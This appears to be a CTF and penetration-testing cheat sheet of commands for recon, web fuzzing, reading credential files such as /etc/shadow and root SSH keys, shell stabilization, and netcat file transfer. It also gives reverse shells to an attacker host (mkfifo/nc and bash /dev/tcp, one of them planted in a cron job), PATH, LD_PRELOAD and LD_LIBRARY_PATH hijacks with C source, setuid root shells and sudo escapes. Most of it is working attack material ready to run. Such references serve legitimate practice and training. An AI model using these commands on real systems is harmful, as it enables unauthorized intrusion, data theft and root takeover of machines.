Network exploration & port scan

rustscan -a [IP]
nmap -p- -T4 [IP]
nmap -p[PORT(s)] -A -sS -sV -sC -Pn -vv -T4 [IP/URL]

Web fuzzing and directory content discovery

dirsearch -u [IP/URL]
gobuster dir [IP/URL] -w [wordlist] -x php,html,txt -t 150
gobuster vhost [IP/URL] -w [wordlist] -t 150
ffuf -w [wordlist] -u http://[IP/URL]/FUZZ -fs 0
ffuf -X POST -w [wordlist] -u 'http://[IP/URL]/api/items?FUZZ=foo'
wfuzz -X POST -w [wordlist] --hh 45 http://[IP/URL]/api/items?FUZZ=foo
wfuzz -c -w [wordlist] -u [IP/URL] -H "Host: FUZZ.[domain]" --hw 914
feroxbuster --url [IP/URL] --wordlist [wordlist]
feroxbuster --url [IP/URL] --wordlist [wordlist] \
    --extensions php,txt,html --statuscodes 200,301,403

Other scans

wpscan --url [IP/URL] -e at,au,ap
nikto -h [IP/URL]

Linux Reconnaissance

id; whoami; pwd; hostname; uname -a; lsb_release -a; hostnamectl | grep Kernel
ls -al /etc/passwd /etc/shadow
cat /etc/issue /etc/*release /etc/group /proc/version /root/.ssh/id_rsa
/bin/bash --version
sudo -l
whois [domain]
host [domain]
whois [IP] | grep "OrgName"
nslookup [domain]
traceroute [domain]
dnsenum --server [domain]
dnsrecon -d [domain]
dig [domain]
wafw00f [domain]
whatweb [www/https-domain]
fierce -dns [domain] -wordlist [wordlist]
urlcrazy domain (benzer siteleri bulur)
mkpasswd -m sha-512 [newpasswordhere] # [change shadow]
openssl passwd [newpasswordhere] # [change passwd(x)]

System File Locations and Descriptions

LocationDescription
/etc/issueContains a message or system identification to be printed before the login prompt.
/etc/profileControls system-wide default variables, such as export variables, file creation mask (umask), terminal types, and mail messages to indicate when new mail has arrived.
/proc/versionSpecifies the version of the Linux kernel.
/etc/passwdContains information about all registered users who have access to the system.
/etc/shadowContains information about the system's users' passwords.
/root/.bash_historyContains the command history for the root user.
/var/log/dmesgContains global system messages, including messages logged during system startup.
/var/mail/rootStores all emails for the root user.
/root/.ssh/id_rsaStores private SSH keys for the root user or any other valid user on the server.
/var/log/apache2/access.logContains logs of accessed requests for the Apache web server.
C:\boot.iniContains boot options for computers with BIOS firmware (Windows).

By understanding the functions and locations of these system files, administrators can effectively manage and troubleshoot system configurations and operations.

Get A Proper Shell (TTY Shell Stabilization Process)

python -c 'import pty;pty.spawn("/bin/bash")'
python3 -c 'import pty; pty.spawn("/bin/bash")'
SHELL=/bin/bash script -q /dev/null
/usr/bin/script -qc /bin/bash /dev/null
script /dev/null -c bash
perl —e 'exec "/bin/sh";'
perl: exec "/bin/sh";
echo os.system('/bin/bash')
/bin/sh -i
ruby: exec "/bin/sh"
lua: os.execute('/bin/sh')
IRB: exec "/bin/sh"
vi: :!bash
vi: :set shell=/bin/bash:shell
nmap: !sh
CTRL + Z
stty size
stty raw -echo; fg
ENTER
reset
export TERM=xterm256-color
export SHELL=bash
stty cols 130 rows 34

How to add your id_rsa.pub to /home/user/.ssh/authorized_keys

ctf hunter commands ctf hunter commands

Copy the key and paste into box:

ctf hunter commands ctf hunter commands

File Transfer Methods

Local:

# on the receiving end run 
nc -l -p <PORT> > <FILENAME>
nc -l -p 1234 > ./archive.tar

Target:

# to send the file 
nc -w 3 <TARGET_IP> <PORT> < <FILENAME>
nc -w 3 [IP] 1234 < ./archive.tar

Elevation of Privilege(EoP)

cp /home/[username]/myfiles/* /opt/backupfiles
echo "/bin/bash" > /tmp/cp
chmod +x /tmp/cp
export PATH=/tmp:$PATH
./backup
# or
echo '/bin/bash -p' > cp
chmod 777 cp
export PATH=/home/[username]/[PATH]:$PATH
echo $PATH

Shell www-data to user

rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/bash -i 2>&1|nc [IP] [PORT] >/tmp/f
# or
bash -c "exec bash -i >& /dev/tcp/[IP]/[PORT] 0>&1"
mv backup.sh old_script && mv new backup.sh && chmod +x backup.sh
nc -nvlp [PORT]

Which program has SUID/SGID

find / -user root -perm -4000 -ls 2>/dev/null
find / -user root -perm /4000
find / -user root -perm -4000 -exec ls -ldb {} \;
find / -user root -perm -4000 -exec ls -ldb {} \; 2>>/dev/null | grep "/bin"
find / -type f -user root -perm -4000 -exec ls -ldb {} \; 2>>/dev/null
find / -type f -a \( -perm -u+s -o -perm -g+s \) -exec ls -l {} \; 2> /dev/null
find / -perm /4000 2>/dev/null
find -perm -4000 -type f 2>/dev/null
find / -perm -u=s -type f 2>/dev/null
# then
ltrace [file_path]
ps aux | grep "^root" # root da çalışan programları listeler
sudo find /bin -name nano -exec /bin/sh \;
sudo awk 'BEGIN {system("/bin/sh")}'
echo "os.execute('/bin/sh')" > shell.nse && sudo nmap --script=shell.nse
sudo vim -c '!sh'
sudo -l
sudo -u#-1 [app] [file]
sudo -u [user]

# Note: you have to look for all of them. Exp:
/usr/bin/system-control

Setuid & Setgid Programs

shell.c:

#include <stdio.h>
#include <stdlib.h>
int main()
{
   setgid(0);
   setuid(0);
   system("/bin/bash");
   return 0;
}

Cron Job Attacks

cat /etc/crontab
#!/bin/bash

bash -i >& /dev/tcp/[IP]/[PORT] 0>&1
#!/bin/bash

cp /bin/bash /tmp/rootbash
chmod +xs /tmp/rootbash

chmod +x /home/user/overwrite.sh
/tmp/rootbash -p

Sudo Privileges

sudo -l

preload.c:

#include <stdio.h>
#include <sys/types.h>
#include <stdlib.h>

void _init() {
    unsetenv("LD_PRELOAD");
    setresuid(0,0,0);
    system("/bin/bash -p");
}

gcc -fPIC -shared -nostartfiles -o /tmp/preload.so /home/user/tools/sudo/preload.c
sudo LD_PRELOAD=/tmp/preload.so program-name-here

LD_LIBRARY_PATH Attacks

library_path.c:

#include <stdio.h>
#include <stdlib.h>

static void hijack() __attribute__((constructor));

void hijack() {
    unsetenv("LD_LIBRARY_PATH");
    setresuid(0,0,0);
    system("/bin/bash -p");
}

ldd /usr/sbin/apache
gcc -fPIC -shared -o /tmp/libcrypt.so.1 /home/user/tools/sudo/library_path.c 
sudo LD_LIBRARY_PATH=/tmp apache2

Manipulate the PATH

echo $PATH
/usr/sbin
sudo -u root /home/user/Desktop/app
cat > /usr/sbin/python << EOF
#!/bin/bash
/bin/bash
EOF
chmod +x /usr/sbin/python
/bin/bash -p

Other Commands

netstat -punta
netstat -ano

Shell Examples

Automation Tools

Checklists

Resources